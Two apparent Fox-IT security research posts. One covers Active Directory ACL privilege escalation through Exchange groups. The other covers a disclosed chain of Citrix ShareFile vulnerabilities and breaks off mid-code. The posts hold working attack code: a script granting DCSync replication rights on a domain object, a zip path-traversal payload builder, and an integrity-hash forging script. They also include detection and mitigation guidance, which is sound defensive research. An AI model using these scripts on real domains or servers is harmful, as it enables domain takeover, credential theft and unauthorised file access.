Escalating privileges with ACLs in Active Directory

Researched and written by Rindert Kramer and Dirk-jan Mollema

Introduction

During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a few hours. Contributing to this are insufficient system hardening and the use of insecure Active Directory defaults. In such scenarios, publicly available tools help in finding and exploiting these issues and often result in obtaining domain administrative privileges. This blog post describes a scenario where our standard attack methods did not work and where we had to dig deeper in order to gain high privileges in the domain. We describe more advanced privilege escalation attacks using Access Control Lists and introduce a new tool called Invoke-ACLPwn and an extension to ntlmrelayx that automate the steps for this advanced attack.

AD, ACLs and ACEs

As organizations become more mature and aware when it comes to cyber security, we have to dig deeper in order to escalate our privileges within an Active Directory (AD) domain. Enumeration is key in these kinds of scenarios. Often overlooked are the Access Control Lists (ACLs) in AD.

An ACL is a set of rules that define which entities have which permissions on a specific AD object. These objects can be user accounts, groups, computer accounts, the domain itself and many more. The ACL can be configured on an individual object such as a user account, but can also be configured on an Organizational Unit (OU), which is like a directory within AD. The main advantage of configuring the ACL on an OU is that, when configured correctly, all descendant objects will inherit the ACL.

The ACL of the OU in which the objects reside contains an Access Control Entry (ACE) that defines the identity and the corresponding permissions that are applied to the OU and/or descendant objects.

The identity that is specified in an ACE does not necessarily need to be a user account itself; it is common practice to apply permissions to AD security groups. By adding a user account as a member of such a security group, the user account is granted the permissions that are configured in the ACE, because the user is a member of that security group.
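
To make the ACL and ACE concepts more tangible, the sketch below dumps the DACL of an AD object over LDAP and prints each ACE. It is a minimal illustration (not part of the tooling discussed later) and assumes the Python ldap3 library together with impacket's ldaptypes parser; the hostname, credentials and distinguished names are placeholders.

from ldap3 import Server, Connection, NTLM, ALL
from ldap3.protocol.microsoft import security_descriptor_control
from impacket.ldap import ldaptypes

# Placeholder DC and credentials
server = Server('dc01.corp.local', get_info=ALL)
conn = Connection(server, user='CORP\\bob', password='Welcome01', authentication=NTLM)
conn.bind()

# Request only the DACL part of the security descriptor (flag 0x04)
controls = security_descriptor_control(sdflags=0x04)
conn.search('DC=corp,DC=local', '(distinguishedName=CN=Users,DC=corp,DC=local)',
            attributes=['nTSecurityDescriptor'], controls=controls)

# Parse the binary security descriptor and walk its ACEs
sd_data = conn.entries[0]['nTSecurityDescriptor'].raw_values[0]
sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_data)
for ace in sd['Dacl']['Data']:
    # Each ACE holds (at least) a trustee SID and an access mask
    print(ace['TypeName'], ace['Ace']['Sid'].formatCanonical(), hex(ace['Ace']['Mask']['Mask']))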

Group memberships within AD are applied recursively. Let’s say that we have three groups:

  • Group_A
    • Group_B
      • Group_C

Group_C is a member of Group_B which itself is a member of Group_A. When we add Bob as a member of Group_C, Bob will not only be a member of Group_C, but also be an indirect member of Group_B and Group_A. That means that when access to an object or a resource is granted to Group_A, Bob will also have access to that specific resource. This resource can be an NTFS file share, printer or an AD object, such as a user, computer, group or even the domain itself.
Providing permissions and access rights with AD security groups is a great way of maintaining and managing (access to) IT infrastructure. However, it may also lead to security risks when groups are nested too often. As described above, a user account will inherit all permissions to resources that are set on the groups of which the user is a direct or indirect member. If Group_A is granted access to modify the domain object in AD, it is quite trivial to discover that Bob inherited these permissions. However, if the user is a direct member of only one group and that group is indirectly a member of 50 other groups, it takes much more effort to discover these inherited permissions.
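
Because these nested memberships expand recursively, they can also be resolved recursively. The snippet below is a small sketch of doing that in a single LDAP query by using the LDAP_MATCHING_RULE_IN_CHAIN matching rule (OID 1.2.840.113556.1.4.1941); the server, credentials and DNs are again placeholders and the ldap3 library is assumed.

from ldap3 import Server, Connection, NTLM, SUBTREE

# Placeholder DC, credentials and user DN
server = Server('dc01.corp.local')
conn = Connection(server, user='CORP\\bob', password='Welcome01', authentication=NTLM)
conn.bind()

user_dn = 'CN=Bob,CN=Users,DC=corp,DC=local'
# Matches every group whose member attribute contains Bob, directly or through nesting
query = '(member:1.2.840.113556.1.4.1941:=%s)' % user_dn
conn.search('DC=corp,DC=local', query, search_scope=SUBTREE, attributes=['distinguishedName'])

for entry in conn.entries:
    print(entry.entry_dn)  # Group_C, Group_B and Group_A would all show up for Bob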

Escalating privileges in AD with Exchange

During a recent penetration test, we managed to obtain a user account that was a member of the Organization Management security group. This group is created when Exchange is installed and provides access to Exchange-related activities. Besides access to these Exchange settings, it also allows its members to modify the group membership of other Exchange security groups, such as the Exchange Trusted Subsystem security group. This group is in turn a member of the Exchange Windows Permissions security group.

grpMembershp

By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain where Exchange was installed [1].

domain_permission

The writeDACL permission allows an identity to modify the permissions on the designated object (in other words: modify the ACL), which means that by being a member of the Organization Management group we were able to escalate our privileges to those of a domain administrator.
To exploit this, we added the user account that we obtained earlier to the Exchange Trusted Subsystem group. We logged on again (because security group memberships are only loaded during login) and were now a member of the Exchange Trusted Subsystem group and the Exchange Windows Permissions group, which allowed us to modify the ACL of the domain.

If you have access to modify the ACL of an AD object, you can assign permissions to an identity that allow it to write to a certain attribute, such as the attribute that contains the telephone number. Besides assigning read/write permissions to these kinds of attributes, it is also possible to assign permissions to extended rights. These rights are predefined tasks, such as the right to change a password, send email to a mailbox and many more [2]. It is also possible to add any given account as a replication partner of the domain by applying the following extended rights:

  • Replicating Directory Changes
  • Replicating Directory Changes All

When we set these permissions for our user account, we were able to request the password hash of any user in the domain, including that of the krbtgt account of the domain. More information about this privilege escalation technique can be found on the following GitHub page: https://github.com/gdedrouas/Exchange-AD-Privesc
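
The sketch below shows how such an attack could look in code once writeDACL on the domain object has been obtained: it fetches the DACL of the domain object, appends two ACCESS_ALLOWED_OBJECT_ACEs carrying the replication extended-rights GUIDs for a controlled account, and writes the descriptor back. It mirrors the approach later described for ntlmrelayx's ACL attack, assumes the Python ldap3 library and impacket's ldaptypes module, and uses placeholder names, credentials and SIDs.

import ldap3
from ldap3 import Server, Connection, NTLM
from ldap3.protocol.microsoft import security_descriptor_control
from impacket.ldap import ldaptypes
from impacket.uuid import string_to_bin

# Extended rights that allow an account to use DCSync
REPL_CHANGES = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'      # Replicating Directory Changes
REPL_CHANGES_ALL = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'  # Replicating Directory Changes All

def build_replication_ace(sid, right_guid):
    # ACCESS_ALLOWED_OBJECT_ACE granting the control access right identified by right_guid
    nace = ldaptypes.ACE()
    nace['AceType'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
    nace['AceFlags'] = 0x00
    acedata = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE()
    acedata['Mask'] = ldaptypes.ACCESS_MASK()
    acedata['Mask']['Mask'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
    acedata['ObjectType'] = string_to_bin(right_guid)
    acedata['InheritedObjectType'] = b''
    acedata['Sid'] = ldaptypes.LDAP_SID()
    acedata['Sid'].fromCanonical(sid)
    acedata['Flags'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT
    nace['Ace'] = acedata
    return nace

domain_dn = 'DC=corp,DC=local'
user_sid = 'S-1-5-21-1111111111-2222222222-3333333333-1105'  # SID of the controlled account

conn = Connection(Server('dc01.corp.local'), user='CORP\\bob', password='Welcome01',
                  authentication=NTLM)
conn.bind()

# Fetch the current DACL of the domain object, append both ACEs and write it back
controls = security_descriptor_control(sdflags=0x04)
conn.search(domain_dn, '(objectClass=domain)', attributes=['nTSecurityDescriptor'],
            controls=controls)
sd_data = conn.entries[0]['nTSecurityDescriptor'].raw_values[0]
sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_data)
for guid in (REPL_CHANGES, REPL_CHANGES_ALL):
    sd['Dacl']['Data'].append(build_replication_ace(user_sid, guid))
conn.modify(domain_dn, {'nTSecurityDescriptor': [(ldap3.MODIFY_REPLACE, [sd.getData()])]},
            controls=controls)
print(conn.result)

After this modification the controlled account can perform DCSync, for example with Mimikatz or impacket's secretsdump.py.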

Obtaining a user account that is a member of the Organization Management group does not happen very often. Nonetheless, this technique can be used on a broader basis. It is possible that the Organization Management group is managed by another group, that that group is managed by yet another group, et cetera. This means there may be a chain throughout the domain that is difficult to discover but that, if correlated correctly, might lead to full compromise of the domain.

To help exploit this chain of security risks, Fox-IT wrote two tools. The first tool is written in PowerShell and can be run within or outside an AD environment. The second tool is an extension to the ntlmrelayx tool. This extension allows the attacker to relay identities (user accounts and computer accounts) to Active Directory and modify the ACL of the domain object.

Invoke-ACLPwn

Invoke-ACLPwn is a PowerShell script that is designed to run with integrated credentials as well as with specified credentials. The tool works by creating an export with SharpHound [3] of all ACLs in the domain, as well as the group memberships of the user account that the tool is running under. If the user does not already have writeDACL permission on the domain object, the tool will enumerate all ACEs of the ACL of the domain. Every identity in an ACE has an ACL of its own, which is added to the enumeration queue. If the identity is a group and the group has members, every group member is added to the enumeration queue as well. As you can imagine, this takes some time to enumerate, but may end up with a chain that yields writeDACL permission on the domain object.
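
Conceptually, this enumeration is a breadth-first search over a graph in which the nodes are identities and objects, and the edges are group memberships and interesting ACE-based rights. The sketch below illustrates only that idea and is not the actual Invoke-ACLPwn code; the edges dictionary is a hypothetical, hand-built stand-in for what would normally be derived from the SharpHound export.

from collections import deque

# Hypothetical takeover edges derived from group membership and ACE data
edges = {
    'BOB@CORP.LOCAL': ['TESTGROUP_A@CORP.LOCAL'],                      # direct group membership
    'TESTGROUP_A@CORP.LOCAL': ['TESTGROUP_B@CORP.LOCAL'],              # nested group membership
    'TESTGROUP_B@CORP.LOCAL': ['ORGANIZATION MANAGEMENT@CORP.LOCAL'],  # right to modify membership
    'ORGANIZATION MANAGEMENT@CORP.LOCAL': ['EXCHANGE TRUSTED SUBSYSTEM@CORP.LOCAL'],
    'EXCHANGE TRUSTED SUBSYSTEM@CORP.LOCAL': ['EXCHANGE WINDOWS PERMISSIONS@CORP.LOCAL'],
    'EXCHANGE WINDOWS PERMISSIONS@CORP.LOCAL': ['CORP.LOCAL'],         # writeDACL on the domain object
}

def find_chain(start, target):
    # Breadth-first search for the shortest path from a user to the domain object
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in edges.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None

print(find_chain('BOB@CORP.LOCAL', 'CORP.LOCAL'))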

help

When the chain has been calculated, the script will then start to exploit every step in the chain:

  • The user is added to the necessary groups
  • Two ACEs are added to the ACL of the domain object:
    • Replicating Directory Changes
    • Replicating Directory Changes All
  • Optionally, Mimikatz’ DCSync feature is invoked and the hash of the given user account is requested. By default, the krbtgt account will be used.

After the exploitation is done, the script will remove the group memberships that were added during exploitation as well as the ACEs in the ACL of the domain object.

To test the script, we created 26 security groups. Every group was a member of the next group (testgroup_a was a member of testgroup_b, which itself was a member of testgroup_c, et cetera, up to testgroup_z).
The security group testgroup_z had the permission to modify the membership of the Organization Management security group. As written earlier, this group had the permission to modify the group membership of the Exchange Trusted Subsystem security group. Being a member of this group will give you the permission to modify the ACL of the domain object in Active Directory.

We now had a chain of 31 links:

  • Indirect membership of 26 security groups
  • Permission to modify the group membership of the Organization Management security group
  • Membership of the Organization Management group
  • Permission to modify the group membership of the Exchange Trusted Subsystem security group
  • Membership of the Exchange Trusted Subsystem and the Exchange Windows Permissions security groups

The result of the tool can be seen in the following screenshot:

exploit

Please note that in this example we used the ACL configuration that is created during the installation of Exchange. However, the tool does not rely on Exchange or any other product to find and exploit a chain.

Currently, only the writeDACL permission on the domain object is enumerated and exploited. There are other types of access rights, such as owner, writeOwner, genericAll, et cetera, that can be exploited on other objects as well. These access rights are explained in depth in the whitepaper by the BloodHound team. Updates to the tool that also exploit these privileges will be developed and released in the future.
The Invoke-ACLPwn tool can be downloaded from our GitHub here: https://github.com/fox-it/Invoke-ACLPwn

NTLMRelayx

Last year we wrote about new additions to ntlmrelayx allowing relaying to LDAP, which allows for domain enumeration and escalation to Domain Admin by adding a new user to the Directory. Previously, the LDAP attack in ntlmrelayx would check if the relayed account was a member of the Domain Admins or Enterprise Admins group, and escalate privileges if this was the case. It did this by adding a new user to the Domain and adding this user to the Domain Admins group.
While this works, this does not take into account any special privileges that a relayed user might have. With the research presented in this post, we introduce a new attack method in ntlmrelayx. This attack involves first requesting the ACLs of important Domain objects, which are then parsed from their binary format into structures the tool can understand, after which the permissions of the relayed account are enumerated.
This takes into account all the groups the relayed account is a member of (including recursive group memberships). Once the privileges are enumerated, ntlmrelayx will check if the user has high enough privileges to allow for a privilege escalation of either a new or an existing user.
For this privilege escalation there are two different attacks. The first is the ACL attack, in which the ACL on the Domain object is modified and a user under the attacker’s control is granted Replication-Get-Changes-All privileges on the domain, which allows for using DCSync as described in the previous sections. If modifying the domain ACL is not possible, the ability to add members to several high-privilege groups in the domain is considered for a Group attack:

  • Enterprise Admins
  • Domain Admins
  • Backup Operators (who can back up critical files on the Domain Controller)
  • Account Operators (who have control over almost all groups in the domain)

If an existing user was specified using the --escalate-user flag, this user will be given the Replication privileges if an ACL attack can be performed, and added to a high-privilege group if a Group attack is used. If no existing user is specified, the options to create new users are considered. This can either be in the Users container (the default place for user accounts), or in an Organizational Unit for which control was delegated, for example to IT department members.
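
In simplified form, the decision logic described above looks roughly like the sketch below. This is not the actual ntlmrelayx code; the privilege dictionary and its keys are hypothetical placeholders for the results of the ACE enumeration.

# High-privilege groups considered for the Group attack
HIGH_PRIV_GROUPS = ['Enterprise Admins', 'Domain Admins', 'Backup Operators', 'Account Operators']

def choose_escalation(privs, escalate_user=None):
    # Prefer the ACL attack: grant replication (DCSync) rights on the domain object
    if privs.get('can_write_domain_dacl'):
        return 'acl_attack', escalate_user or 'create new user'
    # Otherwise, fall back to adding a user to a writable high-privilege group
    for group in HIGH_PRIV_GROUPS:
        if group in privs.get('writable_groups', []):
            return 'group_attack', group
    return None, None

# Example: a relayed Exchange server computer account can typically write the domain DACL
print(choose_escalation({'can_write_domain_dacl': True}, escalate_user='newuser'))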

One may have noticed that we mentioned relayed accounts here instead of relayed users. This is because the attack also works against computer accounts that have high privileges. An example of such an account is the computer account of an Exchange server, which is a member of the Exchange Windows Permissions group in the default configuration. If an attacker is in a position to convince the Exchange server to authenticate to the attacker’s machine, for example by using mitm6 for a network-level attack, privileges can be instantly escalated to Domain Admin.

Relaying Exchange account

The NTDS.dit hashes can now be dumped by using impacket’s secretsdump.py or with Mimikatz:

secretsdump-2

Similarly, if an attacker has administrative privileges on the Exchange server, it is possible to escalate privileges in the domain without the need to dump any passwords or machine account hashes from the system.
Connecting to the attacker from the NT AUTHORITY\SYSTEM perspective and authenticating with NTLM is sufficient to authenticate to LDAP. The screenshot below shows the PowerShell cmdlet Invoke-WebRequest being invoked via psexec.py, which runs it from a SYSTEM perspective. The -UseDefaultCredentials flag enables automatic authentication with NTLM.

psexec-relay

The 404 error here is expected, as ntlmrelayx.py serves a 404 page once the relaying attack is complete.

It should be noted that relaying attacks against LDAP are possible in the default configuration of Active Directory, since LDAP signing, which partially mitigates this attack, is disabled by default. Even if LDAP signing is enabled, it is still possible to relay to LDAPS (LDAP over SSL/TLS) since LDAPS is considered a signed channel. The only mitigation for this is enabling channel binding for LDAP in the registry.
To get the new features in ntlmrelayx, simply update to the latest version of impacket from GitHub: https://github.com/CoreSecurity/impacket

Recommendations

As for mitigation, Fox-IT has a few recommendations.

Remove dangerous ACLs
Check for dangerous ACLs with tools such as BloodHound [3]. BloodHound can make an export of all ACLs in the domain, which helps in identifying dangerous ACLs.

Remove writeDACL permission for Exchange Enterprise Servers
Remove the writeDACL permission for Exchange Enterprise Servers. For more information, see the following TechNet article: https://technet.microsoft.com/en-us/library/ee428169(v=exchg.80).aspx

Monitor security groups
Monitor (the membership of) security groups that can have a high impact on the domain, such as the Exchange Trusted Subsystem and the Exchange Windows Permissions groups.

Audit and monitor changes to the ACL
Audit changes to the ACL of the domain. If not done already, it may be necessary to modify the domain controller policy. More information about this can be found in the following TechNet article: https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced-security-audit-policy-via-ds-access/

When the ACL of the domain object is modified, an event will be created with event ID 5136. The Windows event log can be queried with PowerShell, so here is a one-liner to get all events from the Security event log with ID 5136:

Get-WinEvent -FilterHashtable @{logname='security'; id=5136}

This event contains the account name and the ACL in a Security Descriptor Definition Language (SDDL) format.

event

Since this is unreadable for humans, there is a PowerShell cmdlet in Windows 10, ConvertFrom-SddlString [4], which converts the SDDL string into a more readable ACL object.

sddl

If the server runs Windows Server 2016 as its operating system, it is also possible to see the original and modified descriptors. For more information: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4715

With this information you should be able to start an investigation to discover what was modified, when that happened and the reason behind that.

References

[1] https://technet.microsoft.com/en-us/library/ee681663.aspx
[2] https://technet.microsoft.com/en-us/library/ff405676.aspx
[3] https://github.com/BloodHoundAD/SharpHound
[4] https://docs.microsoft.com/en-us/powershell/module/Microsoft.powershell.utility/convertfrom-sddlstring

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog post describes how Fox-IT identified several vulnerabilities which together allowed any account to access, from the internet, any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several Fortune 500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the cloud or with an on-premise component).

Sharefile

Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at name.sharefile.eu (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which are the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the file transfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request, such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly, we see an h= parameter, followed by a base64-encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called out.zip, which contains two files, one of which has a relative path.

import zipfile

# the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
# the name of the malicious file that will overwrite the original file (must exist on disk)
fname = 'xxe_oob.xml'
# destination path of the file, using ../ sequences to escape the extraction directory
zf.write(fname, '../../../../testbestand_fox.tmp')
# random extra file (not required)
# example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')
zf.close()

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user-controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine that the default extraction path is c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\. We can then add a file with the name ../storage/subdirectory/filename.txt, which will be written to the target directory. The ../ part indicates that the operating system should go one directory higher in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistentstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name indicates, this is the ID assigned to the upload; in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there is a folder for each upload, matching this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:

Info.txt

In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond to the file ID of the upload and the folder ID to which the file is uploaded, respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out that it is a simple md5 hash of the rest of the data in the info.txt file. The twist here is that the data is encoded with UTF-16-LE, which is the default encoding for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and writes it back to disk:

import hashlib

# read the pipe-separated fields of the modified info.txt
with open('info_modified.txt', 'r') as infile:
    instr = infile.read().strip().split('|')

# drop the old hash (the last field) and rejoin the remaining fields
instr2 = u'|'.join(instr[:-1])
# the integrity hash is an uppercase md5 over the UTF-16-LE encoded data
outhash = hashlib.md5(instr2.encode('utf-16-le')).hexdigest().upper()

with open('info_out.txt', 'w') as outfile:
    outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as the temporary name for the file. The data that is uploaded is written to this file, and when the upload is finalized this file is added to the user’s ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt, which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the file size of the secret.txt file we are trying to extract is 14 bytes instead of 13, as the modified info.txt indicated. We can upload a new info.txt file which does have the correct file size, after which the secret.txt file is successfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the requested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter, which contains the download token. Additionally, there is an h parameter which contains an HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<DownloadTokenID>dt6bbd1e278a634e1bbde9b94ff8460b24</DownloadTokenID>
<RequestType>single</RequestType>
<BaseUrl>https://redacted.sf-api.eu/</BaseUrl>
<ErrorUrl>https://redacted.sf-api.eu//error.aspx?type=storagecenter-downloadprep</ErrorUrl>
<StorageBasePath>\\s3\sf-eu-1\;</StorageBasePath>
<BatchID>dt6bbd1e278a634e1bbde9b94ff8460b24</BatchID>
<ZipFileName>tfile</ZipFileName>
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Metadata>
<Item key="operatingsystem" value="Linux" />
</Metadata>
<IrmEnabled>false</IrmEnabled>
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<Items>
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
</Items>
<Log>
<EventID>fif11465-ba81-8b77-7dd9-4256bc375017</EventID>
<UserID>c7add7af-91ac-4331-b48a-0aeed4a58687</UserID>
<OwnerID>c7add7af-91ac-4331-b48a-0aeed4a58687</OwnerID>
<AccountID>a4ea881a-a4d5-433a-fa44-41acd5ed5a5f</AccountID>
<UserEmailAddress>fox-it@redacted</UserEmailAddress>
<Name>tfile</Name>
<FileCount>1</FileCount>
<AdditionalInfo>fif11465-ba81-8b77-7dd9-4256bc375017</AdditionalInfo>
<FolderID>foh160ab-aa5a-4e43-96fd-e41caed36cea</FolderID>
<ParentID>foh160ab-aa5a-4e43-96fd-e41caed36cea</ParentID>
<Path>/root/a4ea881a-a4d5-433a-fa44-41acd5ed5a5f/foh160ab-aa5a-4e43-96fd-e41caed36cea</Path>
<IncrementDownloadCount>false</IncrementDownloadCount>
<ShareID />
</Log>
</ShareFileDownloadInfo>

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with tools such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Integrity of token XML files not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not necessary to calculate the signature as an attacker, since the application simply tells you what the correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended
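
In pseudocode-like form, the signing scheme that we observed boils down to the sketch below. It is a sketch only: the real static key is obviously not included and the XML content is a placeholder.

import hashlib

# Placeholder for the static key that is identical on every StorageZone controller
STATIC_SECRET = b'REDACTED-STATIC-KEY'

def auth_signature(xml_bytes):
    # sha1(secret || data): prepending the secret makes the construction a candidate
    # for a hash length extension attack
    return hashlib.sha1(STATIC_SECRET + xml_bytes).hexdigest()

print(auth_signature(b'<ShareFileDownloadInfo ...>...</ShareFileDownloadInfo>'))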

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation of this path taking place, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains an HMAC, which makes modifying this parameter seemingly impossible:

HMAC Url

However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the URL before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:

uploadid-double.png

We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values, separating them with a comma. Only the first uploadid parameter is verified by the HMAC, since the verification operates on the query string instead of the individual parameter values, and only covers the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Pollution.
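
The sketch below illustrates the mismatch. It is not the actual ShareFile code, and the HMAC-SHA256 construction is only a stand-in for whatever hash the h parameter really uses; the point is that the signature covers the query string only up to the h parameter, while the application later consumes the comma-joined value of every uploadid occurrence.

import hashlib
import hmac
from urllib.parse import parse_qs

SECRET = b'placeholder-shared-secret'

def verify(query_string):
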